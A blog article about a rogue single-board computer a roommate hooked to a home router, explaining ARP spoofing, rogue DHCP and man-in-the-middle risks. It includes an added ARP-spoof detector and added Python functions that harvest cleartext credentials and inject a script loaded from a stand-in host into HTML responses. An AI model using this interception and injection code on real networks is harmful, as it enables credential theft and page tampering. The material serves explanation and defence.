The Reddit Router Scam

A couple of days ago one Reddit user had the misfortune to return home and discover something rather interesting hooked up to their router…

A couple of days ago one Reddit user had the misfortune to return home and discover something rather interesting hooked up to their router, placed there by their roommate. A cross between a multi-level marketing scam and hardware malware, the malicious board had been put into a position that allowed it to harvest every bit of available data from their local network.

“Roommate has come home and stated they found the person on Facebook and installed the device a few days ago. They were told they’d receive $15 a month through direct deposit and all the device will do is run ads for other people when they visit roommate’s Facebook page…
…well it has been a long night but I’ve finally got all my passwords reset and bank cards cancelled. I have no way of knowing what data was taken as it is not stored on the device. Only thing left to do is grill my roommate for information regarding the person/company that gave them this and decide if I have enough to go to the police.”

Looking at the picture of the board itself, it appears to be an off-the-shelf FriendlyARM NanoPi NEO single-board computer. Built around an Allwinner H3 processor, a quad-core ARM Cortex-A7 running at 1.2GHz with 256MB of RAM, the board has a 10/100Mbps Ethernet jack and a micro SD card slot. That’s a specification that provides more than enough horsepower to snoop on any traffic crossing the local network.

For anyone wondering about the single network cable going into the device: a “traditional” man-in-the-middle (MitM) attack would require the board to have two Ethernet connections, with the network traffic passing through it. A board with a single interface on the same LAN can still intercept traffic by redirecting it to itself. The usual technique is ARP spoofing, in which the board answers ARP requests for the router’s IP address with its own MAC address, so that every host on the LAN sends its gateway-bound frames to the board, which quietly forwards them on. Another option is to run a rogue DHCP server that hands out the board’s address as the default gateway or DNS server. Either way, all the traffic on the network can be made to pass through a box with one cable.
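The single-interface trick described above leaves a fingerprint in the ARP traffic that any host on the LAN can see: the router’s IP starts being claimed by a second MAC address, and that MAC claims more than one IP at once. The following is an added example, not code from the original post or from the device it describes; it runs a simple ARP-spoof detector over a constructed list of ARP replies (the gateway address `192.168.1.1` and all MAC addresses are assumed values standing in for what `tcpdump -n arp` would show).

```python
"""Detect ARP-cache poisoning of the default gateway from observed ARP replies.

Added example, not from the original post. Input is a constructed list of
(timestamp, sender_ip, sender_mac) tuples standing in for ARP replies seen on
the wire. GATEWAY_IP and every MAC address below are assumed values.
"""
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"  # assumed home-router address

# Constructed sample: the real router (...:01) answers first, then a second
# MAC (the rogue board) starts claiming the gateway IP and a victim's IP.
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.1.1", "aa:bb:cc:00:00:01"),
    (0.5, "192.168.1.20", "aa:bb:cc:00:00:20"),
    (1.0, "192.168.1.30", "de:ad:be:ef:00:03"),   # board's own address
    (2.0, "192.168.1.1", "de:ad:be:ef:00:03"),    # board claims the gateway
    (2.1, "192.168.1.20", "de:ad:be:ef:00:03"),   # board claims the victim too
    (3.0, "192.168.1.1", "aa:bb:cc:00:00:01"),    # real router answers again
]


def detect_arp_spoof(replies, gateway_ip=GATEWAY_IP):
    """Return {"alerts": [...], "suspect_macs": [...]} for a stream of ARP replies.

    Two symptoms are flagged: the gateway IP's MAC changing (including flapping
    back to the real one), and a single MAC claiming more than one IP address.
    """
    mac_to_ips = defaultdict(set)
    alerts = []
    suspects = set()
    first_gateway_mac = None
    last_gateway_mac = None

    for ts, ip, mac in replies:
        mac = mac.lower()
        mac_to_ips[mac].add(ip)

        if ip == gateway_ip:
            if first_gateway_mac is None:
                first_gateway_mac = mac
            elif mac != first_gateway_mac:
                suspects.add(mac)
            if last_gateway_mac is not None and mac != last_gateway_mac:
                alerts.append(f"{ts:.1f}s gateway {ip} MAC changed "
                              f"{last_gateway_mac} -> {mac}")
            last_gateway_mac = mac

        # Flag a MAC the first time it is seen claiming a second IP.
        if len(mac_to_ips[mac]) == 2:
            suspects.add(mac)
            alerts.append(f"{ts:.1f}s MAC {mac} claims multiple IPs: "
                          f"{sorted(mac_to_ips[mac])}")

    return {"alerts": alerts, "suspect_macs": sorted(suspects)}


if __name__ == "__main__":
    result = detect_arp_spoof(SAMPLE_ARP_REPLIES)
    for line in result["alerts"]:
        print(line)
    print("suspect MACs:", result["suspect_macs"])
```

On a real network the same logic can be fed from `tcpdump -n -e arp` or from periodic snapshots of the host’s ARP table; a gateway MAC that flaps between two values is the classic sign that something is racing the router for its identity.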

While in this particular instance the device seems, at least on the face of it, to be used to “anonymously” buy Facebook advertising, by placing it inside the local network the roommate has given it access to all the data passing through the local network.

If the board is functioning as a MitM proxy, it is also in a place where it can inject JavaScript into any unencrypted web page you’re viewing, as well as harvesting any usernames and passwords passed in the clear. HTTPS keeps page content and credentials out of the proxy’s reach, and HSTS stops it from quietly downgrading you to plain HTTP, but the device still sees which hosts you talk to, since DNS lookups and the server name in the TLS handshake are sent in the clear. So using HTTPS doesn’t mean that the device is harmless.
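To make concrete what a proxy in that position can do with cleartext HTTP, here is an added example (not code from the original post or from the device it describes) that operates on two constructed byte strings standing in for one captured HTTP/1.1 request and response. `harvest_cleartext_credentials()` pulls a Basic-auth header or a login-form POST out of a request, and `inject_script()` rewrites an HTML response to carry an extra `<script>` tag while keeping `Content-Length` consistent. The host `intranet.example`, the credentials and the script URL `http://192.0.2.9/x.js` are all invented for the sample. Both functions fall through unchanged on anything that is not a cleartext HTTP message they understand, which is exactly the case an HTTPS connection presents to the proxy.

```python
"""What a MitM proxy can do with cleartext HTTP (added example, not from the post).

The sample request and response are constructed; host names, credentials and
the injected script URL are assumed values.
"""
import base64
from urllib.parse import parse_qs

CRLF = b"\r\n"

SAMPLE_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: intranet.example\r\n"
    b"Authorization: Basic " + base64.b64encode(b"alice:hunter2") + b"\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 31\r\n\r\n"
    b"username=alice&password=hunter2"
)

SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Content-Length: 42\r\n\r\n"
    b"<html><body><h1>Welcome</h1></body></html>"
)


def _split_message(raw):
    """Split a raw HTTP message into (start_line, lower-cased header dict, body)."""
    head, sep, body = raw.partition(CRLF + CRLF)
    if not sep:
        return None, {}, b""
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def harvest_cleartext_credentials(raw_request):
    """Return credentials visible in a cleartext HTTP request, or {} if none."""
    start, headers, body = _split_message(raw_request)
    found = {}
    if start is None:
        return found
    auth = headers.get(b"authorization", b"")
    if auth.lower().startswith(b"basic "):
        try:
            user, _, pw = base64.b64decode(auth[6:], validate=True).partition(b":")
            found["basic"] = (user.decode(), pw.decode())
        except (ValueError, UnicodeDecodeError):
            pass  # malformed header, nothing to harvest
    ctype = headers.get(b"content-type", b"")
    if start.startswith(b"POST ") and ctype.startswith(b"application/x-www-form-urlencoded"):
        fields = parse_qs(body.decode("utf-8", "replace"))
        for key in ("username", "user", "email", "password", "pass"):
            if key in fields:
                found[key] = fields[key][0]
    return found


def inject_script(raw_response, script_src):
    """Insert <script src=...> before </body> in a cleartext HTML response.

    Returns the bytes unchanged if the response is not plain HTML, is
    compressed or chunked (it would have to be decoded first), or has no
    </body>; otherwise Content-Length is rewritten to match the new body.
    """
    start, headers, body = _split_message(raw_response)
    if start is None or not start.startswith(b"HTTP/1."):
        return raw_response
    if not headers.get(b"content-type", b"").lower().startswith(b"text/html"):
        return raw_response
    if b"content-encoding" in headers or b"transfer-encoding" in headers:
        return raw_response
    idx = body.lower().rfind(b"</body>")
    if idx < 0:
        return raw_response
    new_body = body[:idx] + b'<script src="' + script_src + b'"></script>' + body[idx:]
    head, _, _ = raw_response.partition(CRLF + CRLF)
    new_lines = []
    for line in head.split(CRLF):
        if line.lower().startswith(b"content-length:"):
            line = b"Content-Length: " + str(len(new_body)).encode()
        new_lines.append(line)
    return CRLF.join(new_lines) + CRLF + CRLF + new_body


if __name__ == "__main__":
    print(harvest_cleartext_credentials(SAMPLE_REQUEST))
    print(inject_script(SAMPLE_RESPONSE, b"http://192.0.2.9/x.js").decode())
```

Note that neither function needs anything more than a copy of the bytes on the wire; that is the whole point of the article’s warning about unencrypted pages.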

Many home routers have serious security vulnerabilities, which means that as well as intercepting data the device can, at least potentially, access your router, and in the worst case flash a new, compromised firmware onto it. Afterwards, even if the board itself had difficulty performing a MitM attack, your now compromised router wouldn’t.

Once compromised your router could also be put into service as part of a distributed denial of service (DDoS) botnet for hire, or even used to mine crypto-currency.

“For anyone wanting final closure on this thing’s origins, roommate said it came from a friend of a friend through Facebook and was shipped to the house (but the packing slip has since been thrown away). Roommate said they were tasked with bringing in more people to the scheme with the promise of more money.
So at face value, it is a tool used to further a multi-level marketing scheme; in actuality, it is taking every bit of data used by the poor fools that fall for this…”

Giving an unknown device access to your local network is serious, as most computers, along with most Internet of Things “smart” devices, will trust the other devices on the local network to be “good actors.” By connecting an unknown device to your local network you’re placing a potentially hostile device in a position of implicit trust, and whether you trust it yourself is now irrelevant, because your computers and other devices will.

“Roommate is dumb…”

We can only agree?

Alasdair Allan
Scientist, author, hacker, maker, and journalist. Building, breaking, and writing. For hire. You can reach me at 📫 alasdair@babilim.co.uk.